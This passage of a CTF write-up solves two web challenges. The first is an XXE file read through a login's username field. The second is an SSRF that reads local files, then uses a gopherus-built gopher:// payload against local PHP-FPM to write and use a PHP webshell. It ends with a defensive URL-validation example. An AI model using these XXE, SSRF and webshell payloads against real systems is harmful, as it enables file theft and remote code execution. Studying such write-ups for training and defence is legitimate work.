Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.team
Connection: close
Referer: http://2272c936-816d-4418-93ce-8d9184928b32.ctf.redrock.team/
Cookie: Hm_lvt_217f0d7270e06220a2ec9fbc0877488d=1636718269,1637038834,1637461650

<user><username>admin</username><password>admin1</password></user>

// response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2021 11:45:29 GMT
Server: nginx/1.16.1
X-Powered-By: PHP/7.4.5
Connection: close
Content-Length: 62

<result><code>0</code><msg>admin,xml login fail</msg></result>
```
The response echoes the username in the login failure message, so an XXE payload for arbitrary file reading can be placed in the username:
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>admin1</password></user>
```
Sending it returns the flag directly: redrock{e6c308c4-b14a-493e-b938-7347caecf6a8}. A cnblogs post on XXE for reference: https://www.cnblogs.com/backlion/p/9302528.html
start ssrf:
SSRF can read local files through the file:/// scheme. POSTing url=file:///flag shows nothing, but url=file:///etc/passwd displays the contents of passwd, so the file scheme works. Next, construct a payload that might trigger an error message: url=file:///%00.
```
Warning: curl_setopt(): Curl option contains invalid characters (\0) in /var/www/html/index.php on line 5
```
That leaks the script path, so read the file directly with url=file:///var/www/html/index.php
```
<h1>star刚学了php,他听说php自带curl的功能,于是他写了个网页</h1>
<p>请post url</p>
<h2>请求结果</h2>
<h2><h1>star刚学了php,他听说php自带curl的功能,于是他写了个网页</h1>
<p>请post url</p>
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
?>
<h2>请求结果</h2>
<h2><?php
echo curl_exec($ch);
curl_close($ch);
?></h2>
<script>console.log("hack by yyz!")</script>1</h2>
<script>console.log("hack by yyz!")</script>
```
There is no filtering at all. A hint released later said the stack is nginx plus PHP. Reading the nginx configuration with url=file:////etc/nginx/nginx.conf shows that FastCGI is in use, fastcgi_pass 127.0.0.1:9000, so the SSRF can be turned against the local PHP-FPM service for arbitrary code execution. Build the payload with the gopherus tool:
```
python gopherus.py --exploit fastcgi
[banner omitted]
Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one: /var/www/html/index.php   /* the absolute PHP path obtained above */
Terminal command to run: echo PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsncGFzc3dvcmQnXSk7Pz4= |base64 -d > /var/www/html/shell1.php   /* writes the webshell from base64; the original shell is <?php system($_REQUEST['password']);?> */
Your gopher link is ready to do SSRF:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH147%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%93%04%00%3C%3Fphp%20system%28%27echo%20PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsncGFzc3dvcmQnXSk7Pz4%3D%20%7Cbase64%20-d%20%3E%20/var/www/html/shell1.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00-----------Made-by-SpyD3r-----------
```
URL-encode the generated payload once more (curl decodes it once) and send it; the webshell is written successfully and can then be used: payload=/shell1.php?password=ls /; reveals the file easy_ssrf_flag_bc85c363e9d6fbb576fb9a85632f5135. I assumed that was the flag, but it was rejected, so cat it: payload=shell1.php?password=cat /easy_ssrf_flag_bc85c363e9d6fbb576fb9a85632f5135; (reading it with the file scheme also works).
The final flag is redrock{244ddb7b-d731-43f5-aeae-05332f02874e} (the environment was changed, so this is not the original flag).
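The index.php above passes $_POST['url'] straight into curl, which is what made both the file:// reads and the gopher:// hop to PHP-FPM on 127.0.0.1:9000 possible. As an added example, not code from the challenge, here is the validation such a fetcher needs in front of its outbound request: an allowlist of schemes and ports plus a check that every address the host resolves to is public. FAKE_DNS is a constructed stand-in for DNS so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}

# Constructed stand-in for DNS so the example runs offline. In production resolve with
# socket.getaddrinfo, check every returned address, and then connect to the address you
# checked, not to the hostname again (re-resolving at connect time allows DNS rebinding).
FAKE_DNS = {
    "example.test": ["93.184.216.34"],          # arbitrary public address for the example
    "intranet.example.test": ["10.0.0.5"],      # RFC 1918 range
    "loopback.example.test": ["127.0.0.1"],     # a hostname that points back home
}

def check_url(url, resolve=FAKE_DNS.get):
    """Return (allowed, reason). Rejects the primitives used in the writeup: file:// reads,
    gopher:// to the loopback FastCGI port, and any other scheme, port or destination
    address that is not public HTTP(S)."""
    parts = urlsplit(url.strip())
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        addrs = [ipaddress.ip_address(host)]     # literal IP, including [::1]
    except ValueError:
        resolved = resolve(host)
        if not resolved:
            return False, "unresolvable host %r" % host
        addrs = [ipaddress.ip_address(a) for a in resolved]
    for a in addrs:
        if (a.is_loopback or a.is_private or a.is_link_local or a.is_reserved
                or a.is_multicast or a.is_unspecified):
            return False, "%s resolves to non-public address %s" % (host, a)
    return True, "ok"

if __name__ == "__main__":
    for u in ("file:///etc/passwd", "gopher://127.0.0.1:9000/_%01", "http://example.test/"):
        print(u, check_url(u))
```

Redirects need the same check on every hop, since curl follows a 30x to file:// or to an internal address just as readily when CURLOPT_FOLLOWLOCATION is on.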